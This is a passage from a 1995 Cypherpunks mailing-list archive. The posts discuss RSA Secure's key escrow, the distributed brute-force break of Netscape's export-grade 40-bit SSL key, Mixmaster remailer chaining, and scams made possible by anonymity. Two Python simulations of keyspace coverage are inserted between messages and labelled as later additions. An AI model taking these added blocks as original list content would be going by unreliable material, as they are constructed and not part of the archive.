  keys is seeded by user keystrokes or wiggling the mouse.  The
  GUI for this is really fun to play with, but it only comes up
  when you first install the software.

- The user's passphrase unlocks a master key that is used to unlock
  the file encryption key for each file.

- Tamper detection for encrypted files using an MD5 hash.

- If emergency key access is turned on then the file encrypting
  key is also encrypted with the public key for emergency key
  access.  That public key is usually split into 5 or more pieces
  and two or three of the pieces are required to perform the
  emergency access functions.  A quick look at the file header
  reveals whether the escrow feature is in use.

- Files encrypted with the 40 bit demo version can be read by
  the 80 bit commercial version, and will be automatically
  upgraded to 80 bit security when they are reencrypted.

- Runs on DOS, Windows, Mac, and SunOS.  Other ports coming soon.


Coming Soon:
- Password based file sharing.  A simple way to protect files
  in transit using a secret passphrase known only to the sender
  and receiver.  Currently, only the person who encrypted the
  file can decrypt it.

- Self decrypting binaries.  This allows you to send an encrypted
  file to someone who does not have RSA Secure.  They execute
  the file, which then asks for the password and extracts the
  contents if the password is correct.  The sender can choose
  to use 40 or 80 bit encryption keys in order to comply with
  export regulations.

Request for Improvements:

        What else should be in a product that is aimed at
the commercial laptop market?

                --Bob Baldwin







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William R. Nugent" <wnug@loc.gov>
Date: Thu, 31 Aug 95 06:18:22 PDT
To: cypherpunks@toad.com
Subject: opinions on RSA Secure?
Message-ID: <199508311318.JAA47267@rs8.loc.gov>
MIME-Version: 1.0
Content-Type: text/plain



c'punks:

RSA Secure appears to be a neat commercial package: it loads easily, runs fast,
and generates an 80-bit key using Rivest's RC4. It has an "emergency access"
feature (splittable key escrow) which can, however, be disabled by the user.
Has anyone checked out the innards? How secure is it in industrial/commercial
usage?; against the TLAs?; any hidden trapdoors?
Thanks in advance for your views.

Bill Nugent
Library of Congress
(a personal, not an institutional, query)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 31 Aug 95 09:30:44 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Poisson numbers for random keyspace assignment
Message-ID: <ac6b2e22000210046f2c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:49 AM 8/31/95, MONTY HARDER wrote:
>                  [Great statistical summary deleted]

Thanks. Two other people sent me e-mail saying the odds of a keyspace chunk
being left uncovered are 1/e, so this part is pretty well known. (With an
expectation of "1" of course, as I noted. Interestingly, this was the same
formula we used at Intel to figure out chip yields: "What's the probability
that a chip will have zero defects given that m defects are the "expected"
number?")

I wanted to explain the derivation in more detail than just saying 1/e,
especially for the more interesting cases where the keyspace gets more
coverage. (Where the m = expected value is more than 1.)

>TC> * For opportunistic attacks on keys in challenges, the odds are 95% that a
>TC> key will be found with only twice the total effort (or time) using a
>TC> totally random method of picking up keyspace to search.
>
>  The odds can be improved somewhat by scaling the granularity of the
>sweep to the size of the sweep. (Align larger chunks on large-chunk
>boundaries, eliminating the chance of overlap with other large chunks.)

Indeed, this is an effect to consider. That is, each searcher is
(presumably) not overlapping, so the results I reported are sort of a bound
on the actual numbers. At one end, with lots of searchers doing very small
fractions of the total, the results are pure Poisson. At the other end,
with a searcher covering most or all of the keyspace, then of course the
results are those of nonrandom search. Practically speaking, with dozens or
hundreds of searchers, the Poisson results produce accurate enough
estimates.

>  The best advantage of the random method is that it allows people to
>participate completely anonymously, as there is nothing to report save
>the Eureka!, and that can be done through a remailer anyway. When the
>challenge is solved, everyone can stop cracking.

A very good point! Anonymous cracking has many advantages.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

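Added example (not part of the original message): the coverage arithmetic discussed above, in Python. It extends the 1/e figure to a finite number of searchers, assuming each searcher sweeps an equal share of the total effort and never repeats its own segments; the function names, keyspace size and seed are choices made for this illustration.

```python
import math
import random


def uncovered_poisson(m):
    """Poisson limit: chance a segment is never picked when the expected
    number of visits per segment is m."""
    return math.exp(-m)


def uncovered_exact(m, searchers):
    """Exact chance a segment is missed when `searchers` independent searchers
    each sweep a random m/searchers share of the keyspace, never repeating
    their own segments. (Assumed model, for illustration.)"""
    share = m / searchers
    if not 0 <= share <= 1:
        raise ValueError("each searcher can sweep at most the whole keyspace")
    return (1.0 - share) ** searchers


def simulate(m, searchers, segments=4096, trials=20, seed=1995):
    """Monte Carlo check of uncovered_exact on a constructed keyspace."""
    rng = random.Random(seed)
    per_searcher = round(m * segments / searchers)
    missed = 0
    for _ in range(trials):
        covered = set()
        for _ in range(searchers):
            # Each searcher picks distinct segments; searchers overlap freely.
            covered.update(rng.sample(range(segments), per_searcher))
        missed += segments - len(covered)
    return missed / (segments * trials)


def coverage_table(efforts=(1, 2, 3), searcher_counts=(4, 64, 1024)):
    """Rows of (m, searchers, exact, simulated, Poisson limit)."""
    rows = []
    for m in efforts:
        for s in searcher_counts:
            rows.append((m, s, uncovered_exact(m, s), simulate(m, s),
                         uncovered_poisson(m)))
    return rows


if __name__ == "__main__":
    print(" m  searchers  exact    simulated  Poisson e^-m")
    for m, s, exact, sim, limit in coverage_table():
        print(f"{m:2d}  {s:9d}  {exact:.4f}   {sim:.4f}     {limit:.4f}")
```

With few searchers the uncovered fraction sits below the Poisson value, and it approaches e^-m as the number of searchers grows, which is the bound behaviour described in the message.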





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Stewarts@ix.netcom.com)
Date: Wed, 20 Sep 95 16:27:09 PDT
To: cypherpunks@toad.com
Subject: RE: CIA & ESPIONAGE
Message-ID: <9509201546405398@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 31 Aug 1995 02:31:07 -0700
To: cypherpunks@toad.com
From: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: CIA & Espionage


>> >It was said that Pres. Clinton had given a speech while 
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
>> >said in this speech that obtaining  industrial 
>> >informations has the highest priority and this were the 
>> >new  task for the spies.

Did he really say the priority was stealing information from
other people, or only protecting Big American Companies from 
those nasty French Spy Agency persons?  (Clinton being who he is,
I'd expect him to say a politically correct version of the latter, 
whether he means the former or not, just like his predecessor.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 31 Aug 95 07:21:47 PDT
To: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Subject: Re: your mail
In-Reply-To: <Pine.3.89.9508120103.A2501-0100000@khijol>
Message-ID: <Pine.BSD/.3.91.950831100347.11085H-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 12 Aug 1995, Ed Carp [khijol SysAdmin] wrote:

> I always thought he was an AI program that someone put in a lot of 
> abusive crap to be funny - then someone accidentally let it loose on the 
> net ;)

Unfortunately, this is a wetware being; I did have the pleasure of meeting 
him at a speech given by him and Dave Mandl a few years back.  He did an 
excellent speech, and was very informative.  At the time, being a 
neophyte cypherpunk, I found the info enlightening.  But alas, his human 
interaction skills rate below what one would find in a kindergarten.

He's not a bad guy really, just vicious when it comes to manners.  At 
times, he takes the net.cop attitude.  And we all know how well that 
works in an anarchistic organization/group/entity such as the cypherpunks.
He's a great cryptographer/programmer too from what I've seen.

At times, I do respect his skills, but his attitudes belong in /dev/nul.

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MINITERS@citadel.edu
Date: Thu, 31 Aug 95 07:32:52 PDT
To: cypherpunks@toad.com
Subject: VCRPLUS Huffman code
Message-ID: <01HUPXCYJA9I000AKW@CITCS.Citadel.edu>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone worked out the VCRPLUS code?

The TVGuide has a listing which can be used to set up a VCR by
employing a series of numbers which encode date/timestart/timefinish/channel
in a minimized sequence which I believe is a Huffman code (David Huffman, MIT MS
thesis 1954).  I am interested in whether anyone has taken the time to figure out
the algorithm.
Please respond to me directly so as not to clutter the list, if you don't mind.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 31 Aug 95 02:31:59 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: Poisson numbers for random keyspace assignment
In-Reply-To: <8B0251E.00030003C4.uuout@famend.com>
Message-ID: <"swan.cl.cam.:171030:950831093019"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>   The whole thing can be managed via Imail, which I must point out to
> you Totally Connected People, is the least-common denominator for
> participation here. You have =lots= of people out here who would like to
> join the Cypherpunks Brute Squad (We gotta get T-shirts for this one!)
> but don't have WWW access.

I had the impression that there were email / WWW gateways -- are there not ?
If there are, could someone send me (privately) info, and I'll try to sort
out an easy way to do it.

Failing that, email me with either:

	Subject: Request for brute keyspace

	request 20 segments

or

	Subject: ACK for brute keyspace

	ACK        2977 3659 0ce1 1 no


(some indication of number of email only people who would like to participate
 would be useful. Email me (not CP!) with a subject line of "offer for brute"
 giving your total k/s rate so I know how much power there is out there)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp1.anu.edu.au>
Date: Wed, 30 Aug 95 17:46:55 PDT
To: cypherpunks@toad.com
Subject: PGP on UK TV
Message-ID: <9508310046.AA06956@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if someone has already posted this but I didn't think
I had seen it on the list:

Found this on Uk.misc:

==========================
alecm@coyote.uk.sun.com (Alec Muffett) wrote:
>>
>>	Sunday 3rd September. 7:00pm on Channel 4. Equinox.
>>
>>	"Cybersecurity" - an investigation into cryptography, the
>>	Internet, civil rights, Phil Zimmerman, PGP (and should we be
>>	permitted to use it?) and so forth.
>>
>>I, for one, am going to be videoing it.
>>Let's just hope they get it right.
>
>Having seen a preview trailer of the program I am glad to say that it
>comes down on the _right_ side (ie right to privacy, etc).
>
>It also refers to cipherpunks as "rebel programmers" - I dunno but
>I quite like this description of them :-) Has a sort of cult-hero status
>about it. 
==========================

Sherry

ps Can't watch it cos I'm in Oz let us know if it was any good.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlsiil@attmail.com (Karl A Siil)
Date: Thu, 31 Aug 95 08:21:34 PDT
To: cypherpunks@toad.com
Subject: Re: opinions on RSA Secure?
In-Reply-To: <199508311318.JAA47267@rs8.loc.gov>
Message-ID: <winATT-2.7-karlsiil-1478>
MIME-Version: 1.0
Content-Type: text/plain


Bill, et. al.,

>and generates an 80-bit key using Rivest's RC4. It has an "emergency access"
>feature (splittable key escrow) which can, however, be disabled by the user.
	.
	.
	.
>Bill Nugent
>Library of Congress
>(a personal, not an institutional, query)

To clarify, the Emergency Access (EA) feature's owner (e.g., the Site Security
Officer (SSO)) can determine whether to *allow* users to disable EA. A 
possible way one brings RSA Secure to the(ir) masses of users is as follows:

	The SSO (or some equivalent) gets the software and configures EA 
	(i.e., generates EA keys) on their PC. An important part of
	the EA config is the creation of a User Disk which is distributed
	to the users of the package. On that disk goes the crypto-stuff
	that lets EA work in the future, plus the config data (including
	whether or not the EA can be overridden).

	The users, on getting the User disks from the SSO, then configure
	their PC's to encrypt/decrypt their files. If the SSO hasn't
	allowed EA disabling, when the users encrypt, the "Disable EA"
	checkbox is greyed out (missing? I forget; I would prefer it to
	be missing if not available).

The important thing here is that the ability to control the RSA Secure 
"policy" is in the same hands as the responsibility for creating the org's 
security policy, if any.

Personally, I find RSA Secure to be quite a nice package, from a usage point 
of view. The way it blends into FileManager is really convenient. The less I 
have to "work at" security, the more likely it is that I'll use it. The crypto
is satisfactory for my needs and I'm not going to rehash (no pun intended) the
arguments over RC4-40, etc.


					Karl A. Siil
					AT&T Bell Labs
					Holmdel, NJ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hodges@CNMAT.CNMAT.Berkeley.EDU (Richard Hodges)
Date: Thu, 31 Aug 95 11:36:39 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
Message-ID: <v02130503ac6bbec86307@[128.32.122.198]>
MIME-Version: 1.0
Content-Type: text/plain


Lance Cottrell writes:

>Because of the message size limitations there are some advantages to
>sending the mixmaster chain through some type 1 remailers first, rather
>than sending a type 1 message in a Mixmaster packet.

Are there any gateways that will take a (pgp-encrypted) type 1 message,
with presumably some kind of headers giving onward routing information and
put it into the type 2 network?

Should there be such a service? I think this was discussed earlier, but
Lance's statement above seems to reopen the discussion.


>It is very difficult to know what fraction of the traffic I see is cover. I
>generate some cover traffic my self, and I know some others do as well.
>Right now a reordering pool of 5 messages results in a latency of about 30
>min. Mixmaster is no longer a small fraction of the remailer market. A
>majority of all public remailers support Mixmaster.

What is the total daily volume of mixmaster traffic for all the advertised
mixmasters? Has anyone measured this statistic?

Regards,
Richard Hodges






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@hns.com (Tom Rollins)
Date: Thu, 31 Aug 95 09:26:18 PDT
To: cypherpunks@toad.com
Subject: Fiat Shamir Zero Knowledge Test
Message-ID: <9508311626.AA12640@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


Hello,

Can someone point me to a net description of
the "Fiat Shamir Zero Knowledge Test" used
in the RCA DirecTV smart cards.

Thanks in advance...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Thu, 31 Aug 95 10:30:38 PDT
To: jirib@cs.monash.edu.au
Subject: Re: SSL search attacks
In-Reply-To: <199508310926.TAA18041@sweeney.cs.monash.edu.au>
Message-ID: <9508311728.AA16306@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum writes
>> *coordinated* attack on the key.  We've established that there is a 1/e
>> cost factor in removing the central server.  I just threw out these
>...
>
>Wouldn't it be possible to reduce the cost?
>
>Each client could pick a segment at random, check it and then broadcast
>a NAK. Other clients would then know that the segment in question has
>been done, and avoid picking it in the future. If you are worried about
>collisions, one could also have IGRAB, which would advise others that
>someone is working on a segment (you can still collide, but not so
>often).

This only reduces the cost if everyone is playing fair.  In practice,
it will usually *increase* the cost.  A denial of service attack can be
mounted by the owner of the key just by anonymously NAKing the segment
with the key.  Then you have to search the *whole* keyspace, fail to
find it, and start over with a new strategy.

>One advantage is that it is not necessary to have a central infinitely
>trusted server. (Nothing personal, but bogus server is an attack.)

An attack on what?  The overall model here is that someone presents
the world at large with a problem to solve.  Someone else volunteers
to coordinate the effort by providing a server.  Providing a bogus
server is an attack in the sense that it wastes the CPU cycles of
the clients, but they're junk cycles anyway.  It's kind of like the
issue about being "unable to participate" because the group effort
ignores the efforts of random searchers.  Those searchers *aren't*
participating, and not ignoring them opens the server to attack.
An "effort" coordinated by a bogus server is no effort at all.

My point is that the "random" efforts are no different than everyone
working on the problem independently, each picking a random place to
start and going sequentially from there.

>NAKs and IGRABs would be weighted by the trust accorded to the entity
>that originated them.

This is similar to what I outlined yesterday afternoon.  Let unsolicited
NAKs and IGRABs represent adjustments to the probability that a segment
is assigned to a client *inside* the group.  Invalid unsolicited NAKs
don't destroy the current search, they only slow it down slightly ---
but less than a fully random effort.

>Notes:
>  * the NAKs could be sent by e-mail, thus allowing badly connected
>and/or anonymous entities to participate.

This could be done in any case.  It just slows down the effective search
rate of the e-mail participants.

This might be an argument in favor of requesting more space as you get
near the end of your current space, though.  When the communications
latency starts to approach the segment search time, you cut down your
waiting time by prefetching work.
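
Added example (not part of the original message): a small Python simulation of the point made above, that treating unsolicited NAKs as assignment-weight adjustments rather than hard exclusions keeps a false NAK on the key's segment from ending the search. The `trust` factor, the policy names, the keyspace size and the seeds are assumptions chosen for this illustration; only the NAK concept comes from the thread.

```python
import random


def run_search(policy, num_segments, key_segment, unsolicited_naks, trust, rng):
    """Sweep segments until the key is found or nothing is left to assign.

    policy "hard":     any NAK removes the segment from the pool.
    policy "weighted": an unsolicited NAK only scales the segment's
                       assignment weight by (1 - trust), with trust < 1;
                       a NAK from the client that was assigned the segment
                       removes it.
    policy "random":   no coordination; every sweep is an independent pick.
    Returns (found, segments_swept).
    """
    weight = [1.0] * num_segments
    if policy == "hard":
        for seg in unsolicited_naks:
            weight[seg] = 0.0
    elif policy == "weighted":
        for seg in unsolicited_naks:
            weight[seg] *= 1.0 - trust
    elif policy != "random":
        raise ValueError(policy)

    swept = 0
    while any(w > 0.0 for w in weight):
        seg = rng.choices(range(num_segments), weights=weight)[0]
        swept += 1
        if seg == key_segment:
            return True, swept
        if policy != "random":
            weight[seg] = 0.0  # solicited NAK from the assigned client
    return False, swept


def mean_sweeps(policy, unsolicited_naks, trust=0.5, num_segments=64,
                key_segment=10, runs=500):
    """Average over constructed runs; returns (fraction_found, mean_swept)."""
    found_count, total_swept = 0, 0
    for seed in range(runs):
        found, swept = run_search(policy, num_segments, key_segment,
                                  unsolicited_naks, trust, random.Random(seed))
        found_count += found
        total_swept += swept
    return found_count / runs, total_swept / runs


if __name__ == "__main__":
    false_nak = {10}  # constructed: a bogus NAK on the segment holding the key
    scenarios = [
        ("coordinated, no interference", "weighted", set()),
        ("hard exclusion, false NAK", "hard", false_nak),
        ("weighted, false NAK", "weighted", false_nak),
        ("fully random picking", "random", set()),
    ]
    for label, policy, naks in scenarios:
        rate, mean = mean_sweeps(policy, naks)
        print(f"{label:30s} found {rate:4.0%}  mean segments swept {mean:6.1f}")
```

Under hard exclusion the false NAK makes every run sweep the other 63 segments and come up empty; under the weighted policy every run still finds the key, at a cost between the undisturbed coordinated search and fully random picking.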




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 31 Aug 95 09:37:40 PDT
To: cypherpunks@toad.com
Subject: Crypto '95
Message-ID: <199508311637.MAA24666@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anything really fun revealed at Crypto?

Anything fun at the rump session?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 31 Aug 95 12:33:30 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
Message-ID: <ac6bbf36020210047fff@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 PM 8/31/95, Richard Hodges wrote:
>Lance Cottrell writes:
>
>>Because of the message size limitations there are some advantages to
>>sending the mixmaster chain through some type 1 remailers first, rather
>>than sending a type 1 message in a Mixmaster packet.
>
>Are there any gateways that will take a (pgp-encrypted) type 1 message,
>with presumably some kind of headers giving onward routing information and
>put it into the type 2 network?
>
>Should there be such a service? I think this was discussed earlier, but
>Lance's statement above seems to reopen the discussion.
>
>
>>It is very difficult to know what fraction of the traffic I see is cover. I
>>generate some cover traffic my self, and I know some others do as well.
>>Right now a reordering pool of 5 messages results in a latency of about 30
>>min. Mixmaster is no longer a small fraction of the remailer market. A
>>majority of all public remailers support Mixmaster.
>
>What is the total daily volume of mixmaster traffic for all the advertised
>mixmasters? Has anyone measured this statistic?
>
>Regards,
>Richard Hodges

You don't need anything this fancy. Just have Mixmaster dump the message to
a file rather than sending it (-o option). Then make that the message you
send through the type 1 chain, and make the first Mixmaster remailer the
final destination of the type 1 chain.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 31 Aug 95 06:10:43 PDT
To: Sam Quigley <poodge@econ.berkeley.edu>
Subject: Re: yabc
In-Reply-To: <199508310523.WAA21036@quesnay.Berkeley.EDU>
Message-ID: <Pine.SOL.3.91.950831135429.29780C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Sam Quigley wrote:
 
> Also, it seems that there have been some "extensions" to the SKSP
> protocol...  For instance, suddenly there are different machines
> dedicated just to ACKs, etc.  Is there a central repository of these
> changes?  (Have these changes even been publicly reviewed?)

These aren't changes to the protocol, which just defines what a client and
a server should understand.  The "local" servers that only do ACKs are
designed to collect up responses from a local client farm and then feed
them en-masse to the central server, using SKSP.

To answer your second point, there are ideas being floated around between 
Adam, Piete and myself as to the "next step".

I had the idea that the load on the central server might be reduced by
having a system where clients register their availability times, PGP key
and computing horsepower to the server, and the server calls the client at
the start of an available period and hands it a keyspace that fills the
time available.  PGP signatures on all exchanges would authenticate the
parties and it would be impossible for large keyspaces to be requested in
error or maliciously.  Un-ack'd keyspaces would wrap around.  This idea
needs quite a bit more coding and people have expressed reservations about
just how much load would be saved.

On the other hand, Piete has a proposal that also uses PGP signatures and
retains the existing protocol.  The central server would remain as is, but
would only accept ACKs from servers that it trusted via a signed PGP key. 
There would be a small number of such second level servers, perhaps one in
each country.  This hierarchy of trust extends downwards as far as is
necessary in each country with clients being at the leaf nodes of the
tree.  This method spreads the load worldwide in a very effective manner,
with the final central server only receiving calls from a handful of other
servers.  This idea needs less coding than mine and solves the immediate
problem. 

We're still talking, and listening...


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 31 Aug 95 15:51:30 PDT
To: "William R. Nugent" <wnug@loc.gov>
Subject: Re: opinions on RSA Secure?
In-Reply-To: <199508311318.JAA47267@rs8.loc.gov>
Message-ID: <Pine.BSD.3.91.950831154639.27318A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 31 Aug 1995, William R. Nugent wrote:

> Date: Thu, 31 Aug 1995 09:18:18 -0400
> From: William R. Nugent <wnug@loc.gov>
> To: cypherpunks@toad.com
> Subject: opinions on RSA Secure?
> 
> 
> c'punks:
> 
> RSA Secure appears to be a neat commercial package: it loads easily, runs fast,
> and generates an 80-bit key using Rivest's RC4. It has an "emergency access"
> feature (splittable key escrow) which can, however, be disabled by the user.
> Has anyone checked out the innards? How secure is it in industrial/commercial
> usage?; against the TLAs?; any hidden trapdoors?
> Thanks in advance for your views.

The fact that the key is only 80 is a *major* compromise.  I would 
recommend that package to no-one.   With only a 80 bit key you don't 
*need* trapdoors, granted they may be more "convenient" but the fact is 
the 80 key *can* [and certainly will] be broken...

Summary: Don't use it.


Btw, this is not an opposition to RSA, RSA is very good - it is an 
opposition to the length of the key...

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Thu, 31 Aug 95 08:01:51 PDT
To: cypherpunks@toad.com
Subject: UK Guardian article on 2nd SSL breaking
Message-ID: <199508311501.RAA19171@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



from the "uk-pipeline":

>>>>>>>>>>>>>>>>>>>>

  CYPHERPUNKS LEAD NETSCAPE'S NAVIGATOR ASTRAY
  
  A team of computer experts has succeeded in breaking the secure 'key' 
  used on international versions of the World-Wide Web browser, Netscape 
  Navigator.
  
  The key would normally have been used to secure transmission of sensitive 
  information, such as credit card details, between a Web-surfer and a Web 
  site, such as an on-line shopping service.
  
  However, the cypherpunks, as they are known, only cracked the 40-bit key 
  that is used by export versions of Netscape Navigator, since US 
  Government regulations prevent the export of software that uses stronger 
  cryptographic techniques. "We have, quite categorically, demonstrated 
  that 40-bit keys are too weak to use for commercial systems," said Dr. 
  Piete Brookes, a computer officer at Cambridge University who managed the 
  project.  The code cracking took 31 hours and 47 minutes of computer time 
  on around 300 machines strung across the internet.
  
  The team was able to crack the code because they had been provided with 
  the transcript of a secure transmission.  Such transcripts are not 
  impossible to acquire, according to Dr. Brookes: "All you need is a tap 
  on the line, or access to a computer in a suitable part of the network.". 
  The 128-bit key used by American versions of Netscape Navigator is "well 
  out of reach of any hacker groups in the foreseeable future."  He 
  estimates it would take one billion, billion, billion, billion years to 
  break.
  
  	Azeem Azhar
  
  Further information can be found on the World-Wide Web at 
  http://www.dcs.ex.ac.uk/~aba/

>>>>>>>>>>>>>>>>>>>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 31 Aug 95 17:22:53 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6b9e29040210042a10@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:32 PM 8/31/95, Scott Brickner wrote:
>I was thinking about some issues related to electronic commerce, and it
>occurred to me that there is a significant problem in conducting
>business with untraceable pseudonyms (anonyms?).  The problem occurred
>to me while considering inheritance.
>
>If one operates a business under an anonym (as opposed to the sort of
>conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit
>Cards" <URL:ftp://ftp.research.att.com/dist/anoncc/anoncc.ps.Z>),
>there's a strategy for transferring unlimited funds to one's
>posterity.
>
>Consider a business which typically has a lot of assets, but which are
>offset by a lot of liabilities --- almost any sort of VAR will do, for
>instance.  In your will, you leave the key to unlock a private message
>to your heir, in which you hand over the information necessary to
>assume your anonym.  Since the heir presumably has his own identity
>(whether anonymous or not is immaterial, except to *his* heirs), and
>the anonym can't be linked to you, he has no reason to care about
>maintaining the reputation of the anonym.  In dismantling the anonym,
>he sells its assets to his own identity at a fraction of their worth,
>and defaults on the liabilities.
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^

You don't have to look to death and inheritance for this problem to crop
up. Similar situations arise when:

- a pseudonym simply decides to dissolve the current pseudonym and shift
focus to another pseudonym (perhaps transferring a bunch of assets, then
simply vanishing and leaving "no forwarding address")

(This is of course the basis of any number of scams and "boiler room
operations." Crypto does not completely eliminate scams like this, and, in
fact, generates some new kinds of scams.)

- this is also a well-known problem with any services that handle money,
valuables, etc. For example, the money courier who vanishes to Rio de
Janeiro.

This is one thing that _bonding_ is designed to partially ameliorate. One
posts a bond which is greater than the amount being carried, or at least is
some large amount. (Calculations are complex, and various agencies may have
various policies, depending on other reputation factors.)


>Since the anonym behaved reputably during its life, it developed what
>would have been a credit-worthy reputation, had it been a (traceable)
>pseudonym.  But, since there's nothing to link the anonym to its heirs
>(or ancestors), the creditors of the anonym must eat the loss.

The concept of "reputation capital" is a critical one.

Ideally, one never "trusts" an agent with a transaction greater than the
value of the reputation capital he will lose if he defaults.

There are still scams and maneuvers to thwart this reputation capital
scheme. The agent planning to "defect" (default, split, abscond, renege,
etc.) can try to pile up as many pending transactions as possible,
anticipating that the various transactees will be unaware of each other.
(This of course happens in real life.)

Whether cryptographic protocols (cf. the "encrypted open books" proposal by
Eric Hughes for one approach which may be useful) solve this problem is not
known at this time. But the non-crypto world has of course not solved this
problem, either.

...
>A market which permits anonyms to have credit based on reputation will
>probably have a constant stream of defaults caused by such behavior,
>representing a significant risk factor in extending credit to anonyms
>which can't be predicted by reputation.
>
>Comments?

Lots of issues need to be thought about. My hunch is that economists, game
theorists, and scam artists will all discover digital money and pseudonyms
and will explore various aspects of this situation.

I devoted a pretty big chunk of my Cyphernomicon to these "darker sides" of
anonymity, of reputation capital, and suchlike. By no means did I cover all
the issues of "crypto anarchy," but I suggest interested folks take a look
at the chapter on crypto anarchy for more discussion.

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 31 Aug 95 17:43:41 PDT
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: opinions on RSA Secure?
In-Reply-To: <95Aug31.202112edt.1621@cannon.ecf.toronto.edu>
Message-ID: <Pine.BSD.3.91.950831174002.16046A-100000@usr1.primenet.com>
MIME-Version: 1.0
